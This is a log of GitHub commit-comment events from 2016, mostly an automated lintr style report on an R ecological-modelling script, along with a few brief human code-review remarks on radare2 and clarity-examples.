{"id":"4580539997","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19072095,"position":43,"line":2154,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-18T20:08:58Z","updated_at":"2016-09-18T20:08:58Z","body":"missing space before ("}},"created_at":"2016-09-18T20:08:58Z"}
{"id":"4580540111","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19072096,"position":47,"line":2158,"path":"libr/anal/esil.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-18T20:09:03Z","updated_at":"2016-09-18T20:09:03Z","body":"same here"}},"created_at":"2016-09-18T20:09:03Z"}
{"id":"4580541173","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19072097,"position":529,"line":523,"path":"libr/anal/p/anal_avr.c","commit_id":"09f384a2521d8fb83934c81d954fb1e50d8597fc","created_at":"2016-09-18T20:09:46Z","updated_at":"2016-09-18T20:09:46Z","body":"looks like a debug printf"}},"created_at":"2016-09-18T20:09:46Z"}
{"id":"4580545324","type":"CommitCommentEvent","actor":{"login":"spheenik"},"repo":{"name":"skadistats/clarity-examples"},"payload":{"comment":{"id":19072099,"position":null,"line":null,"path":null,"commit_id":"4562d023338fad9eeabb9a800ddd60d8cccb3bfe","created_at":"2016-09-18T20:12:16Z","updated_at":"2016-09-18T20:12:16Z","body":"@micaelbergeron: I implemented what we talked about on the yasp-thread.\r\nThis is in clarity-2.2-SNAPSHOT, which should still be backwards compatible with 2.1."}},"created_at":"2016-09-18T20:12:16Z"}
{"id":"4580545631","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072100,"position":null,"line":null,"path":null,"commit_id":"6d337e7609c34b8029f91e2a2575922f65ed0a81","created_at":"2016-09-18T20:12:23Z","updated_at":"2016-09-18T20:12:23Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      